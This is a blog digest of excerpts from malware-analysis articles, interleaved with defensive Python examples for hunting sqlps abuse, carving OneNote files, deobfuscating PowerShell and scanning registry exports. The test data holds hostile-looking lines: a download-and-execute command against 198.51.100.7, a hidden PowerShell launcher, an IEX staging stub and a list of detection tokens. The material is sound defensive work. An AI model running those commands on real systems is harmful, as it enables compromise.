Analysis Notes

A place to jot down notes from trying my hand at malware analysis and anything that looks useful for analysis. This site uses Google Analytics.

4n6 Week 22 – 2023 - MALWARE

This entry was generated and posted automatically to show the opening lines of each article featured in This Week in 4n6 (FourAndSix = Forensics), so that the articles worth reading can be picked out quickly. The 4n6 post itself can be found here.

MALWARE

0day in {REA_TEAM}

(1) [QuickNote.En] CobaltStrike SMB Beacon Analysis (1) [QuickNote] Analysis of malware suspected to be an APT attack targeting Vietnam (1) [QuickNote] Analysis of Pandora ransomware (1) [QuickNote] Another nice PlugX sample (1) [QuickNote] CobaltStrike SMB Beacon Analysis (1) [QuickNote] Decrypting the C2 configuration of Warzone RAT (1) [QuickNote] Emotet epoch4 & epoch5 tactics (1) [QuickNote] Techniques for decrypting BazarLoader strings (1) [QuickNote] VidarStealer Analysis (1) [Write-up] C...

ASEC

AhnLab Security Emergency response Center (ASEC) has recently discovered the case of Remcos RAT being installed on poorly managed MS-SQL servers. Unlike the past attack, the recent case showed the threat actor using sqlps to distribute the malware. Sqlps is SQL Server PowerShell and is included in the SQL Server installation procedure[1]. SQL Server Powershell allows users to use the Powershell cmdlet which is needed to manage SQL Server instances. The attacker exploited this trait in distributi...
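The sqlps abuse described above has a simple process-ancestry signature: the database engine forking a shell (what xp_cmdshell looks like on the endpoint), followed by sqlps.exe carrying download or decoding arguments. The following Python is an added example for this note, not ASEC's detection content. SAMPLE_EVENTS are constructed process-creation records with three fields (parent image, image, command line); the paths and the 198.51.100.7 address are made up, and a real pipeline would map the fields from Sysmon Event ID 1 or Security Event 4688. The caveat built into the logic: SQL Server Agent PowerShell job steps launch sqlps.exe legitimately, so the second rule keys on parent and arguments rather than on the sqlps image alone.

```python
"""Hunt for MS-SQL servers spawning SQL Server PowerShell (sqlps) or shells.

Added example for this note, not ASEC's detection content. SAMPLE_EVENTS are
constructed process-creation records with three fields (parent_image, image,
command_line); map them from whatever your EDR or Sysmon pipeline emits. The
paths and the 198.51.100.7 address are made up.
"""
from __future__ import annotations

import ntpath

SQL_ENGINE = {"sqlservr.exe"}
SHELL_IMAGES = {"sqlps.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "certutil.exe", "bitsadmin.exe", "mshta.exe"}
# Arguments that turn sqlps from an admin tool into a downloader/decoder.
STAGING_TOKENS = ("-enc", "-e ", "downloadstring", "downloadfile",
                  "invoke-webrequest", "iwr ", "frombase64string",
                  "start-bitstransfer", "net.webclient")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event: dict[str, str]) -> str | None:
    """Return a verdict string for a suspicious event, else None."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"].lower()
    # 1. The database engine itself forking a shell: what xp_cmdshell looks like.
    if parent in SQL_ENGINE and image in SHELL_IMAGES:
        return f"{parent} spawned {image}"
    # 2. sqlps used to fetch or decode a payload rather than to manage SQL Server.
    #    Key on the arguments: SQL Agent PowerShell job steps run sqlps.exe too.
    if image == "sqlps.exe" and any(tok in cmd for tok in STAGING_TOKENS):
        return f"sqlps.exe launched by {parent} with staging arguments"
    return None


def hunt(events: list[dict[str, str]]) -> list[tuple[int, str]]:
    """Index and verdict for every flagged event."""
    return [(i, v) for i, e in enumerate(events) if (v := classify(e))]


# Constructed records; the engine -> cmd -> sqlps chain mirrors the article.
SAMPLE_EVENTS = [
    {   # xp_cmdshell: the engine forks cmd.exe
        "parent_image": r"C:\MSSQL\Binn\sqlservr.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": 'cmd.exe /c sqlps -Command "Invoke-WebRequest '
                        'http://198.51.100.7/update.exe -OutFile $env:TEMP\\up.exe; & $env:TEMP\\up.exe"',
    },
    {   # the sqlps child doing the download
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\MSSQL\Binn\sqlps.exe",
        "command_line": 'sqlps -Command "Invoke-WebRequest '
                        'http://198.51.100.7/update.exe -OutFile $env:TEMP\\up.exe; & $env:TEMP\\up.exe"',
    },
    {   # benign: SQL Agent PowerShell job step
        "parent_image": r"C:\MSSQL\Binn\SQLAGENT.EXE",
        "image": r"C:\MSSQL\Binn\sqlps.exe",
        "command_line": 'sqlps -Command "Backup-SqlDatabase -ServerInstance . -Database Sales"',
    },
    {   # benign noise
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe",
    },
]

if __name__ == "__main__":
    for index, verdict in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {verdict}")
```

Run against the constructed records, the first rule fires on the engine-to-cmd.exe hop and the second on the sqlps download, while the Agent-driven backup job is left alone.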

AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of malware targeting web servers by Kimsuky group. Kimsuky is a threat group deemed supported by North Korea and has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a Korean energy corporation in 2014. Since 2017, their attacks have been targeting countries other than South Korea as well. [1] ASEC has been providing the analysis of vari...

AhnLab Security Emergency response Center (ASEC) has recently discovered that the Kimsuky group had created a webmail website that looks identical to certain national policy research institutes. Earlier this year, ASEC had covered similar issues in the posts ‘Web Page Disguised as a Kakao[1]/Naver[2] Login Page’. The previous attacker set the fake login page with autocompleted IDs of trade, media, and North Korea-related individuals and organizations. In addition to that, the recently discovered...

AhnLab Security Emergency response Center (ASEC) analysis team has recently confirmed the StrelaStealer Infostealer being distributed to Spanish users. StrelaStealer was initially discovered around November 2022 and has been distributed as an attachment to spam emails. In the past, ISO files were used as attachments, but recently, ZIP files have been utilized instead. Figure 1. Distributed email The email that is being distributed is similar to the one shown in Figure 1. The email body and the n...

AhnLab Security Emergency response Center (ASEC) has recently confirmed the Lazarus group, a group known to receive support on a national scale, carrying out attacks against Windows IIS web servers. Ordinarily, when threat actors perform a scan and find a web server with a vulnerable version, they use the vulnerability suitable for the version to install a web shell or execute malicious commands. The AhnLab Smart Defense (ASD) log displayed below in Figure 1 shows that Windows server systems are...

AhnLab Security Emergency response Center (ASEC) has recently discovered the DarkCloud malware being distributed via spam email. DarkCloud is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud. 1. Distribution Method The threat actor sent the following email to induce users to download and execute the attachment. Figure 1. Email from the threat actor with the malware attached The contents of this email prompt us...

AhnLab Security Emergency response Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the week from May 7th, 2023 to May 13th, 2023 and provide statistical information on each type. Generally, phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineeri...

Following the recent abuse of vulnerabilities in various malware distributions and attacks, it is becoming more crucial to detect said information early on. Zero-day and other various vulnerabilities are typically spread faster through social networks. AhnLab provides the trend of current vulnerabilities through the ATIP service based on the information collected by the in-house infrastructure. Additionally, ATIP offers information on said vulnerabilities’ characteristics and countermeasures thr...

The Kimsuky group’s activities in March 2023 showed a decline in comparison to their activities in February. Unlike the past where most major issues were found in the FlowerPower type, this month was focused on the RandomQuery type, which showed the highest amount of activity. The FlowerPower type began to use “Korean domains”, and it has been confirmed that the RandomQuery type has been using various initial distribution methods and using new ways to distribute xRAT. Finally, it has been confir...

This report provides statistics on new ransomware samples, attacked systems, and targeted businesses in March 2023, as well as notable ransomware issues in Korea and overseas. Other major issues and statistics for ransomware that are not mentioned in the report can be found by searching for the following keywords or via the statistics menu at AhnLab Threat Intelligence Platform (ATIP). Ransomware Statistics by Type The number of ransomware samples and targeted systems are based on the aliases de...

March 2023 Deep Web & Dark Web Threat Trend Report This trend report on the deep web and dark web of March 2023 is sectioned into Ransomware, Forum & Black Market, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true. 1) Ransomware (1) Clop Ransomware (2) BlackCat (Alphv) Ransomware (3) LockBit Ransomware (4) Medusa Ransomware 2) Forum & Black Market (1) Breached Forums Closed 3) Threat Actor (1) Netwire RAT Malware Infrastructure Confis...

AhnLab Security Emergency response Center (ASEC) uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from May 15th, 2023 (Monday) to May 21st, 2023 (Sunday). For the main category, Infostealer ranked top with 43.8%, followed by downloader with 36.9%, backdoor with 15.3%, ransomware with 3.4%, and CoinMiner with 0.6%. Top 1 – Amadey This week, Amadey Bot ranked first place with 25.6%. Amadey is a downloader that...

AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded. However, there have been recent cases indicating the resurgence of malware distributing SparkRAT through the inst...

c3rb3ru5d3d53c

YouTube video

Erik Pistelli at Cerbero

This malicious OneNote document contains two obfuscated batch scripts and we’ll be using our commercial Simple Batch Emulator package to understand what they do. SHA256: 46149F56028829246628FFAFC58DF81A4B0FF1C87ED6466492E25AD2F23C0A13 We open the first batch script and decode its data to text with the action “Conversion -> Bytes to text” (Ctrl+R). This is the batch script and as we can see it’s obfuscated. GIFTS WITH DISCOUNTS >nul 2>&1 LIMITED OFFER @echo off echo Opening cloud attachment. Plea...
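Getting the embedded scripts out of a OneNote file does not need a commercial tool. As an added example for this note (not Cerbero's code), the Python below carves every embedded file by walking the FileDataStoreObject records defined in MS-ONESTORE: a 16-byte header GUID {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}, an 8-byte little-endian length, 4 unused bytes, 8 reserved bytes, the payload, and a 16-byte footer GUID {71FBA722-0F79-4A0B-BB13-899256426B24}. SAMPLE_ONE is constructed inline and is not the document from the article; it includes a forged record whose length field points past the end of the file, which the carver rejects by insisting on the footer GUID.

```python
"""Carve embedded files out of a OneNote (.one) document.

Added example for this note, not Cerbero's code. It relies on the MS-ONESTORE
FileDataStoreObject layout: a 16-byte header GUID
{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}, an 8-byte little-endian payload
length, 4 unused bytes, 8 reserved bytes, the payload, then a 16-byte footer
GUID {71FBA722-0F79-4A0B-BB13-899256426B24}. SAMPLE_ONE is constructed below;
it is not the document from the article.
"""
from __future__ import annotations

import struct
import uuid

HEADER_GUID = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FOOTER_GUID = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
HEADER_LEN = 16 + 8 + 4 + 8  # guidHeader + cbLength + unused + reserved


def carve_embedded_files(blob: bytes) -> list[bytes]:
    """Return each embedded file's bytes in the order they appear."""
    payloads: list[bytes] = []
    pos = blob.find(HEADER_GUID)
    while pos != -1:
        if pos + HEADER_LEN > len(blob):
            break
        (length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + HEADER_LEN
        end = start + length
        # Trust cbLength only if the footer GUID sits exactly where it says;
        # a forged or corrupt length would otherwise swallow the rest of the file.
        if end + 16 <= len(blob) and blob[end:end + 16] == FOOTER_GUID:
            payloads.append(blob[start:end])
            pos = blob.find(HEADER_GUID, end + 16)
        else:
            pos = blob.find(HEADER_GUID, pos + 16)
    return payloads


def looks_like_batch(data: bytes) -> bool:
    """Cheap triage for carved payloads: batch/PowerShell launcher markers."""
    text = data.decode("latin-1").lower()
    return any(m in text for m in ("@echo off", "cmd /c", "powershell", "%comspec%"))


def triage(blob: bytes) -> list[tuple[int, bool]]:
    """(size, looks_like_batch) for every carved file."""
    return [(len(p), looks_like_batch(p)) for p in carve_embedded_files(blob)]


def build_record(payload: bytes) -> bytes:
    """Wrap bytes in a FileDataStoreObject record (used to build test data)."""
    return HEADER_GUID + struct.pack("<Q", len(payload)) + b"\x00" * 12 + payload + FOOTER_GUID


# Constructed sample: two embedded scripts separated by filler, plus a forged
# header whose cbLength points far past the end of the file.
SCRIPT_A = b"@echo off\r\necho Opening cloud attachment. Please wait\r\n"
SCRIPT_B = b"cmd /c start /min powershell -w hidden -c whoami\r\n"
SAMPLE_ONE = (
    b"\x00" * 64
    + build_record(SCRIPT_A)
    + b"\xff" * 32
    + HEADER_GUID + struct.pack("<Q", 1 << 40) + b"\x00" * 12
    + build_record(SCRIPT_B)
)

if __name__ == "__main__":
    for i, (size, batch) in enumerate(triage(SAMPLE_ONE)):
        print(f"embedded file {i}: {size} bytes, batch-like={batch}")
```

Point the carver at a real .one file (`carve_embedded_files(open(path, "rb").read())`) and the returned payloads are the same bytes the article decodes with "Bytes to text"; the batch heuristic only orders what to look at first.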

ClearSky Cyber Security

Cluster25

By Cluster25 Threat Intel Team, May 22, 2023. BlackByte is a Ransomware-as-a-Service (RaaS) group that is known for the use of the homonymous malware that is constantly updated and spread in different variants. The first implementation of the malware was written in the C# programming language, which was followed by a Golang implementation that also integrated a privilege escalation technique that exploited the Bring Your Own Vulnerable Driver (BYOVD) vulnerability. The last implementation, known a...

Bret at Cyber Gladius

If you have not heard, Adobe’s ColdFusion has a killer RCE vulnerability. As a result, I have a few new Windows IIS webserver incidents to investigate. Most of the investigation focused on determining what the attacker did and if data exfiltration occurred. To answer this question, I had to perform a lot of PowerShell deobfuscation. So I wanted to write up my process to deobfuscate malicious PowerShell and maybe help those facing the same challenge in the future. Before I jump into this maliciou...
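The deobfuscation work the post describes is mostly mechanical: an `-EncodedCommand` argument is base64 of UTF-16LE text, the decoded stub usually hands another base64 blob to `FromBase64String`, and that blob is often a gzip stream fed through `GzipStream`. The Python below is an added example for this note, not Cyber Gladius' tooling; it peels those layers until nothing recognisable remains. SAMPLE_CMDLINE is constructed here from a harmless innermost command (it only zips a web root to the temp directory, the kind of staging you would be looking for when answering the exfiltration question).

```python
"""Peel the PowerShell obfuscation layers most often met when triaging
web-server compromises: -EncodedCommand (base64 of UTF-16LE), inner
FromBase64String blobs, and gzip-compressed stages.

Added example for this note, not Cyber Gladius' tooling. SAMPLE_CMDLINE is
constructed below and its innermost command is harmless.
"""
from __future__ import annotations

import base64
import binascii
import gzip
import re
import zlib

# -e, -ec, -en, -enc and the full name are all accepted by powershell.exe.
ENC_CMD_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Any long run of base64 alphabet, e.g. the argument of FromBase64String('...').
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _bytes_to_text(raw: bytes) -> str:
    """-EncodedCommand carries UTF-16LE; inner stages are usually UTF-8.
    ASCII text in UTF-16LE has a NUL in every odd position."""
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) == len(raw) // 2:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def _mostly_printable(text: str) -> bool:
    ok = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return bool(text) and ok / len(text) > 0.95


def peel_once(layer: str) -> str | None:
    """Decode one obfuscation layer; None when nothing recognisable remains."""
    m = ENC_CMD_RE.search(layer)
    if m:
        blob = m.group(1)
        return _bytes_to_text(base64.b64decode(blob + "=" * (-len(blob) % 4)))
    for blob in B64_RE.findall(layer):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            if raw[:2] == b"\x1f\x8b":  # gzip magic: a compressed stage
                raw = gzip.decompress(raw)
        except (binascii.Error, OSError, EOFError, zlib.error):
            continue  # a long identifier that merely looked like base64
        text = _bytes_to_text(raw)
        if _mostly_printable(text):
            return text
    return None


def deobfuscate(cmdline: str, max_layers: int = 8) -> list[str]:
    """Outer-to-inner list of layers; the last entry is what actually ran."""
    layers = [cmdline]
    while len(layers) <= max_layers:
        inner = peel_once(layers[-1])
        if inner is None or inner in layers:
            break
        layers.append(inner)
    return layers


# Constructed sample: harmless command -> gzip+base64 stub -> -Enc wrapper.
INNER_COMMAND = (r"Get-ChildItem C:\inetpub\wwwroot -Recurse | "
                 r"Compress-Archive -DestinationPath $env:TEMP\w.zip")
_gz_b64 = base64.b64encode(gzip.compress(INNER_COMMAND.encode("utf-8"))).decode("ascii")
STAGE2 = (
    "IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
    f"[IO.MemoryStream][Convert]::FromBase64String('{_gz_b64}'),"
    "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::UTF8)).ReadToEnd()"
)
_enc = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell.exe -NoP -NonI -W Hidden -Enc {_enc}"

if __name__ == "__main__":
    for depth, layer in enumerate(deobfuscate(SAMPLE_CMDLINE)):
        print(f"layer {depth}: {layer[:100]}")
```

The printable-text check is what stops a long identifier or hash from being mistaken for a stage; when the last layer still contains `Invoke-Expression` or string concatenation tricks, that is the point to switch to manual work.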

dr4k0nia

NixImports: a .NET loader using HInvoke. Posted May 22, 2023 (updated May 22, 2023) by dr4k0nia, 8 min read. A while ago, I released HInvoke, a project showcasing API hashing for managed functions. The initial release was rather basic and lacked desirable features like support for non-static methods. NixImports is an example showing the use of the new HInvoke. The update includes support for non-static methods as well as support for nonunique method names. In this blog post, I will describe ...

Igor Skochinsky at Hex Rays

Igal lytzki at Toxin Labs

Kraken - The Deep Sea Lurker Part 2. Part 2 of analyzing the KrakenKeylogger Malware. 5 minute read, by 0xToxin (Threat Analyst & IR team leader - Malware Analysis - Blue Team). Contents: Intro; What we have?; thereccorp.com Analysis; RareCommodityHelper.exe; masherofmasters.cy...

InfoSec Write-ups

Ghidra — A powerful Reverse Engineering Tool. By Suprajabaskaran, published in InfoSec Write-ups, 5 min read, May 20. Hello everyone, I recently started exploring Ghidra, an open-source reverse engineering tool. Through reverse engineering, hackers can analyze a program’s components and functionalities in order to identify any vulnerabilities. By analyzing the code or binary of the program, one can recover the original software design for more...

Learn how to reverse engineer a basic level binary to get a password. By Jay Vadhaiya, published in InfoSec Write-ups, 10 min read, May 19. Greetings of the day everyone, in today’s blog post I am going to showcase how to use certain tools to analyze and reverse engineer a simple binary program to get a hidden password. Without further ado, let’s get started. Introduction. Reverse Engineering of a binary is a process of analyzing and understandin...

Lab52

May 22, 2023. The malware team at Lab52 has a saying that our colleagues know well: “We want your malware”. On this occasion, the Threat Intelligence team gifted us a file that appeared to be a dropper. The file was already flagged by 15 antivirus engines on VirusTotal as malicious. Target file in VirusTotal Among the open files, the results of specific calls to Powershell.exe are displayed. VirusTotal information from the sandboxes Due to its context, it could be interesting to investigate it furt...

Jakub Kaloč at WeLiveSecurity

ESET researchers reveal details about a prevalent cryptor, operating as a cryptor-as-a-service used by tens of malware families. Jakub Kaloč, 25 May 2023 - 11:30AM. In this blogpost we examine the operation of AceCryptor, originally documented by Avast. This cryptor has been around since 2016 and because – throughout its existence – it has been used to pack tens of m...

Zhassulan Zhussupov

Malware development trick - part 29: Store binary data in registry. Simple C++ example. 7 minute read ﷽ Hello, cybersecurity enthusiasts and white hackers! Today, I just want to focus my research on another malware development trick: storing binary data in Windows Registry. It is a common technique that can be used by malware for persistence or also to store malicious payloads. practical example 1 Below is a simple example code of storing binary data in the registry: void registryStore() { HKEY ...
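The snippet above shows the attacker's side of the trick: a byte buffer written to a key with the registry API. The analyst's side is reading the same data back out, and `reg export` gives it to you as text: REG_BINARY values appear as `hex:` (or `hex(N):` for other typed values, N being the REG_* type id in hexadecimal), comma-separated bytes, with long values continued across lines by a trailing backslash and two-space indent. The Python below is an added example for this note, not the article's C++ code; it parses such an export and flags values that look like staged payloads (PE header, large size, high entropy). SAMPLE_REG is constructed inline, including a `hex(2):` REG_EXPAND_SZ value to show that the type suffix is parsed rather than assumed.

```python
"""Scan a .reg export for binary values that look like staged payloads.

Added example for this note, not the article's C++ code. The article shows
the attacker writing a byte buffer into the registry; this is the analyst
reading a `reg export` file back and flagging REG_BINARY values by PE header,
size and entropy. SAMPLE_REG is constructed below.
"""
from __future__ import annotations

import math
import re
from typing import Iterator

KEY_RE = re.compile(r"^\[(.+)\]$")
# "Name"=hex:..  "Name"=hex(2):..  @=hex:..   (type id is hexadecimal, 3 = REG_BINARY)
HEX_RE = re.compile(
    r'^(?:"(?P<name>[^"]*)"|(?P<default>@))=hex(?:\((?P<type>[0-9a-fA-F]+)\))?:(?P<data>.*)$'
)


def logical_lines(text: str) -> Iterator[str]:
    """Join regedit's backslash-continued lines into one logical line each."""
    buf = ""
    for raw in text.splitlines():
        line = buf + raw.strip()
        buf = ""
        if line.endswith("\\"):
            buf = line[:-1]
            continue
        yield line
    if buf:
        yield buf


def parse_reg_export(text: str) -> list[tuple[str, str, int, bytes]]:
    """(key, value name, REG_* type id, bytes) for every hex-encoded value."""
    values = []
    key = ""
    for line in logical_lines(text):
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = HEX_RE.match(line)
        if not m:
            continue  # string/dword values and headers are not of interest here
        name = m.group("name") if m.group("name") is not None else "(Default)"
        type_id = int(m.group("type") or "3", 16)
        hexpart = m.group("data").replace(",", "").strip()
        values.append((key, name, type_id, bytes.fromhex(hexpart) if hexpart else b""))
    return values


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; packed or encrypted payloads sit near 8."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def suspicious_values(text: str, min_size: int = 256, min_entropy: float = 6.5) -> list[tuple[str, list[str]]]:
    """(key\\name, reasons) for values worth pulling out and looking at."""
    hits = []
    for key, name, _type_id, data in parse_reg_export(text):
        reasons = []
        if data[:2] == b"MZ":
            reasons.append("PE header")
        if len(data) >= min_size:
            reasons.append(f"{len(data)} bytes")
        if len(data) >= 64 and shannon_entropy(data) >= min_entropy:
            reasons.append("high entropy")
        if reasons:
            hits.append((f"{key}\\{name}", reasons))
    return hits


def reg_hex_lines(data: bytes, per_line: int = 25) -> str:
    """Format bytes the way regedit exports them (used to build test data)."""
    parts = [f"{b:02x}" for b in data]
    chunks = [",".join(parts[i:i + per_line]) for i in range(0, len(parts), per_line)]
    return "hex:" + ",\\\n  ".join(chunks)


# Constructed export: a benign flag, a PE stub, a high-entropy blob, a typed string.
PAYLOAD_PE = b"MZ\x90\x00" + b"\x00" * 124
PAYLOAD_RANDOMISH = bytes(range(256)) + bytes(range(256))[::-1]
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\Example\\Settings]\n"
    '"Flags"=hex:01,00,00,00\n'
    '"Theme"="dark"\n\n'
    "[HKEY_CURRENT_USER\\Software\\Example\\Cache]\n"
    f'"Blob"={reg_hex_lines(PAYLOAD_PE)}\n'
    f'"Data"={reg_hex_lines(PAYLOAD_RANDOMISH)}\n'
    '"Path"=hex(2):43,00,3a,00,5c,00,00,00\n'
)

if __name__ == "__main__":
    for where, reasons in suspicious_values(SAMPLE_REG):
        print(f"{where}: {', '.join(reasons)}")
```

The entropy threshold is deliberately below 8 so that base64- or XOR-wrapped payloads still register; what comes out as a hit is then carved with `bytes.fromhex` already done, ready to hand to a disassembler or a second-stage decoder.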

Malware development trick - part 30: Find PID via NtGetNextProcess. Simple C++ example. 5 minute read ﷽ Hello, cybersecurity enthusiasts and white hackers! Today, I just want to focus my research on another malware development trick: enum processes and find PID via NtGetNextProcess. It is a common technique that can be used by malware for AV evasion also. what’s the trick? We just simply utilize additional undocumented features. NtGetNextProcess is a system call made available by the kernel that...

Nikolaos Pantazopoulos and Brett Stone-Gross at ZScaler
